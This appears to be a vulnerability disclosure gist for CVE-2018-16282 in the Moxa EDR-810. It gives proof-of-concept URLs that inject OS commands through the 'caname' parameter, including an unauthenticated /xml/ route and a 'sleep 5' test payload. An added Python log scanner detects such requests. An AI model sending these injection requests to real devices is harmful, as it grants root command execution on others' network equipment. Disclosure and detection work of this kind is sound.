@tim124058
Created September 19, 2018 09:50
CVE-2018-16282: EDR-810 Remote Code Execution

CVE-2018-16282

Suggested description:

Command injection vulnerability in the web server functionality of Moxa EDR-810 V4.2 build 18041013 allows remote attackers to execute arbitrary OS commands with root privilege via the "caname" parameter in the "/xml/net_WebCADELETEGetValue" URI.

@tim124058
Author

POC:

An authenticated attacker can use an HTTP GET request to remotely execute arbitrary OS commands with root privilege,
like this:

http://<IP>/goform/net_WebCADELETEGetValue?caname=";<OS COMMAND>;"

But if /goform/ is replaced with /xml/,
a remote attacker can execute arbitrary OS commands with root privilege without any authentication,
like this:

http://<IP>/xml/net_WebCADELETEGetValue?caname=";<OS COMMAND>;"


Test payload:

If the page takes about 5 seconds to load, the device is affected by this vulnerability.

http://<IP>/xml/net_WebCADELETEGetValue?caname="; sleep 5 ;"


Get shell:

The attacker can execute arbitrary OS commands with root privilege.
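A log check for the request pattern described above, as an added example that is not part of the original gist or its comment. It flags requests to `net_WebCADELETEGetValue` under either prefix whose decoded `caname` value contains shell metacharacters. The access-log layout (a common-format log from a proxy or sensor in front of the device), the function names and the sample lines are assumptions constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Endpoint and parameter named in the advisory; it lists both URL prefixes.
ENDPOINT = re.compile(r"^/(xml|goform)/net_WebCADELETEGetValue$")
# Characters that let a value break out of a quoted shell argument.
SHELL_META = re.compile(r"[;|&`$\"'<>\\\n\r]")
# Assumed layout: common access-log format written by a proxy in front of the device.
REQUEST = re.compile(
    r'^(?P<src>\S+) .*?"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+" (?P<status>\d{3})'
)

def inspect_line(line):
    """Return a finding dict for a suspicious request, or None."""
    m = REQUEST.match(line)
    if not m:
        return None
    url = urlsplit(m["target"])
    hit = ENDPOINT.match(url.path)
    if not hit:
        return None
    # parse_qs percent-decodes once, so %22%3B becomes ";
    values = parse_qs(url.query, keep_blank_values=True).get("caname", [])
    bad = [v for v in values if SHELL_META.search(v)]
    if not bad:
        return None
    return {
        "src": m["src"],
        "prefix": hit.group(1),
        # The advisory states the /xml/ prefix needs no authentication.
        "unauthenticated_path": hit.group(1) == "xml",
        "caname": bad[0],
    }

def scan(lines):
    """Inspect every log line and keep only the findings."""
    return [f for f in map(inspect_line, lines) if f]

# Constructed sample log lines (documentation addresses, not real traffic).
SAMPLE = [
    '192.0.2.10 - - [19/Sep/2018:09:50:00 +0000] "GET /xml/net_WebCADELETEGetValue?caname=%22%3B%20sleep%205%20%3B%22 HTTP/1.1" 200 12',
    '192.0.2.11 - admin [19/Sep/2018:09:51:00 +0000] "GET /goform/net_WebCADELETEGetValue?caname=old-ca.pem HTTP/1.1" 200 12',
    '192.0.2.12 - admin [19/Sep/2018:09:52:00 +0000] "GET /goform/net_WebCADELETEGetValue?caname=a%7Cb HTTP/1.1" 200 12',
    '192.0.2.13 - - [19/Sep/2018:09:53:00 +0000] "GET /index.html HTTP/1.1" 200 512',
]

if __name__ == "__main__":
    for finding in scan(SAMPLE):
        print(finding)
```

A finding with `unauthenticated_path` set deserves the higher priority, since that request needed no session on the device.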
